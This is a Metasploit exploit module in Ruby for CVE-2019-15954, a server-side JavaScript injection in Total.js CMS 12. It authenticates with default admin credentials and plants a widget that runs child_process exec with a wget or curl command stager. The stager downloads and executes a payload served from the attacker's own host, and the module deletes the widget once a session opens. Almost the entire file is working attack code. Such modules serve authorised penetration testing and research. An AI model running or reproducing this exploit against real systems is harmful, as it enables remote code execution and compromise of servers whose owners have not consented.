##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection',
'Description'=> %q{
This module exploits a vulnerability in Total.js CMS. The issue is that a user with
admin permission can embed a malicious JavaScript payload in a widget, which is
evaluated server side, and gain remote code execution.
},
'License'=> MSF_LICENSE,
'Author' =>
[
'Riccardo Krauter', # Original discovery
'sinn3r'# Metasploit module
],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets'=>
[
[ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
[ 'Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]
],
'References' =>
[
['CVE', '2019-15954'],
['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
],
'DefaultOptions' =>
{
'RPORT' => 8000,
},
'Notes'=>
{
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'Privileged' => false,
'DisclosureDate' => '2019-08-30', # Reported to seclist
'DefaultTarget'=> 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
])
end
class AdminToken
attr_reader :token
def initialize(cookie)
@token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first
end
def blank?
token.blank?
end
end
class Widget
attr_reader :name
attr_reader :category
attr_reader :source_code
attr_reader :platform
attr_reader :url
def initialize(p, u, stager)
@name = "p_#{Rex::Text.rand_text_alpha(10)}"
@category = 'content'
@platform = p
@url = u
@source_code= %Q|<script total>|
@source_code << %Q|global.process.mainModule.require('child_process')|
@source_code << %Q|.exec("sleep 2;#{stager}");|
@source_code << %Q|</script>|
end
end
def check
code = CheckCode::Safe
res = send_request_cgi({
'method' => 'GET',
'uri'=> normalize_uri(target_uri.path, 'admin', 'widgets')
})
unless res
vprint_error('Connection timed out')
return CheckCode::Unknown
end
# If the admin's login page is visited too many times, we will start getting
# a 401 (unauthorized response). In that case, we only have a header to work
# with.
if res.headers['X-Powered-By'].to_s == 'Total.js'
code = CheckCode::Detected
end
# If we are here, then that means we can still see the login page.
# Let's see if we can extract a version.
html = res.get_html_document
element = html.at('title')
return code unless element.respond_to?(:text)
title = element.text.scan(/CMS v([\d\.]+)/).flatten.first
return code unless title
version = Gem::Version.new(title)
if version <= Gem::Version.new('12')
# If we are able to check the version, we could try the default cred and attempt
# to execute malicious code and see how the application responds. However, this
# seems to a bit too aggressive so I'll leave that to the exploit part.
return CheckCode::Appears
end
CheckCode::Safe
end
def auth(user, pass)
json_body = { 'name' => user, 'password' => pass }.to_json
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'),
'ctype'=> 'application/json',
'data' => json_body
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
json_res = res.get_json_document
cookies = res.get_cookies
# If it's an array it could be an error, so we are specifically looking for a hash.
if json_res.kind_of?(Hash) && json_res['success']
token = AdminToken.new(cookies)
@admin_token = token
return token
end
fail_with(Failure::NoAccess, 'Invalid username or password')
end
def create_widget(admin_token)
platform = target.platform.names.first
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
port = datastore['SRVPORT']
proto = datastore['SSL'] ? 'https' : 'http'
payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
widget = Widget.new(platform, url, generate_cmdstager(
'Path' => "#{get_resource}/#{payload_name}",
'temp' => '/tmp',
'file' => payload_name
).join(';'))
json_body = {
'name' => widget.name,
'category' => widget.category,
'body' => widget.source_code
}.to_json
res = send_request_cgi({
'method' => 'POST',
'uri'=> normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype'=> 'application/json',
'data' => json_body
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
res_json = res.get_json_document
if res_json.kind_of?(Hash) && res_json['success']
print_good("Widget created successfully")
else
fail_with(Failure::Unknown, 'No success message in body')
end
widget
end
def get_widget_item(admin_token, widget)
res = send_request_cgi({
'method' => 'GET',
'uri'=> normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype'=> 'application/json'
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
res_json = res.get_json_document
count = res_json['count']
items = res_json['items']
unless count
fail_with(Failure::Unknown, 'No count key found in body')
end
unless items
fail_with(Failure::Unknown, 'No items key found in body')
end
items.each do |item|
widget_name = item['name']
if widget_name.match(/p_/)
return item
end
end
[]
end
def clear_widget
admin_token = get_admin_token
widget = get_widget
print_status('Finding the payload from the widget list...')
item = get_widget_item(admin_token, widget)
json_body = {
'id'=> item['id'],
'picture' => item['picture'],
'name'=> item['name'],
'icon'=> item['icon'],
'category'=> item['category'],
'datecreated' => item['datecreated'],
'reference' => item['reference']
}.to_json
res = send_request_cgi({
'method' => 'DELETE',
'uri'=> normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype'=> 'application/json',
'data' => json_body
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
res_json = res.get_json_document
if res_json.kind_of?(Hash) && res_json['success']
print_good("Widget cleared successfully")
else
fail_with(Failure::Unknown, 'No success message in body')
end
end
def on_request_uri(cli, req)
print_status("#{cli.peerhost} requesting: #{req.uri}")
if req.uri =~ /p_.+/
payload_exe = generate_payload_exe(code: payload.encoded)
print_status("Sending payload to #{cli.peerhost}")
send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})
return
end
send_not_found(cli)
end
def on_new_session(session)
clear_widget
end
# This is kind of for cleaning up the wiget, because we cannot pass it as an
# argument in on_new_session.
def get_widget
@widget
end
# This is also kind of for cleaning up widget, because we cannot pass it as an
# argument directly
def get_admin_token
@admin_token
end
def exploit
user = datastore['TOTALJSUSERNAME']
pass = datastore['TOTALJSPASSWORD']
print_status("Attempting to authenticate with #{user}:#{pass}")
admin_token = auth(user, pass)
fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
print_good("Authenticatd as: #{user}:#{pass}")
print_status("Creating a widget...")
@widget = create_widget(admin_token)
super
end
end